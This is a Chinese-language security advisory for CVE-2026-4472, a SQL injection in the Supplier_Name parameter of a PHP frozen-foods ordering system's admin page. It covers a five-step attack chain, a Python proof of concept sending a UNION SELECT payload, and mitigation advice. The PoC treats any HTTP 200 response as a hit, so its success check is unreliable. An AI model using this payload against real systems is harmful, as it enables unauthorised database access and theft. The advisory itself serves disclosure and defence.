CVE-2026-4472: Online Frozen Foods系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-4472

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Frozen Foods Ordering System

漏洞概述

itsourcecode Online Frozen Foods Ordering System 1.0版本被检测出存在安全漏洞。问题出在/admin/admin_edit_supplier.php文件中，未对用户输入的Supplier_Name参数进行充分过滤。远程攻击者利用低权限账户即可发起攻击，通过操纵该参数注入恶意SQL代码。该漏洞已被公开披露，可能造成敏感数据泄露、数据完整性受损及系统可用性降低。

技术细节

该漏洞的根本原因在于后端PHP代码在构建数据库查询时，采用了不安全的字符串拼接方式。具体而言，在/admin/admin_edit_supplier.php文件中，Supplier_Name参数被直接嵌入到SQL语句中，导致应用层与数据库层之间的边界被打破。攻击者可以利用经典的SQL注入技术，例如通过UNION查询联合提取数据，或者利用布尔盲注、时间盲注等方式获取数据库结构。由于CVSS向量显示PR:L（低权限），攻击者首先需要获取一个合法的会话Cookie或基础账户凭证。一旦具备低权限身份，攻击者即可构造包含恶意SQL负载的数据包发送至服务器。成功的利用可能导致认证绕过、读取管理员密码哈希、篡改供应商数据甚至删除数据表，对系统的机密性、完整性和可用性均构成威胁。

攻击链分析

STEP 1

侦察与访问

攻击者定位目标系统，并获取一个低权限账户的登录凭证（如普通管理员账号），以满足CVSS PR:L的要求。

STEP 2

漏洞探测

攻击者使用已登录的会话，向/admin/admin_edit_supplier.php发送请求，并在Supplier_Name参数中插入SQL注入测试载荷（如单引号），观察服务器响应异常。

STEP 3

构造攻击载荷

确认存在注入后，攻击者构造恶意的SQL语句（如UNION SELECT），旨在提取数据库结构、管理员密码或其他敏感数据。

STEP 4

执行攻击

发送包含恶意SQL代码的POST请求，后端数据库执行该语句，将查询结果返回给攻击者或直接修改数据库内容。

STEP 5

后续利用

利用获取的数据进一步提权，或破坏数据库完整性，完全控制受影响的系统组件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
target_url = "http://target-host.com/admin/admin_edit_supplier.php"

# Attacker needs a valid session (Low Privilege Required per CVSS:PR:L)
cookies = {
    "PHPSESSID": "valid_low_privilege_session_id"
}

# Malicious payload to test SQL Injection in 'Supplier_Name' parameter
# Example: Attempting to extract database version using UNION-based injection
payload = "test' UNION SELECT 1, version(), 3, 4, 5, 6-- -"

# Data to be sent in the POST request
post_data = {
    "Supplier_Name": payload,
    "id": "1"  # Assuming an ID is required to identify the supplier to edit
}

try:
    response = requests.post(target_url, data=post_data, cookies=cookies)

    # Check if the response indicates a potential SQL injection (e.g., DB version in output)
    if "mysql" in response.text.lower() or response.status_code == 200:
        print("[+] Potential SQL Injection vulnerability triggered.")
        print("[+] Response snippet:")
        print(response.text[:500])
    else:
        print("[-] Exploit attempt did not yield expected immediate results.")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

itsourcecode Online Frozen Foods Ordering System 1.0

防御指南

临时缓解措施

建议立即检查并更新itsourcecode Online Frozen Foods Ordering System至最新版本或应用官方补丁。在未修复前，应严格限制对/admin/目录的网络访问，仅允许可信IP访问，并加强对系统异常登录和数据库操作的监控。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4472
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4472
3 Details https://www.cvedetails.com/cve/CVE-2026-4472/
4 VulDB https://vuldb.com/cve/CVE-2026-4472
5 Link https://github.com/rockycheng1/cve/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.351762
8 Link https://vuldb.com/?id.351762
9 Link https://vuldb.com/?submit.775207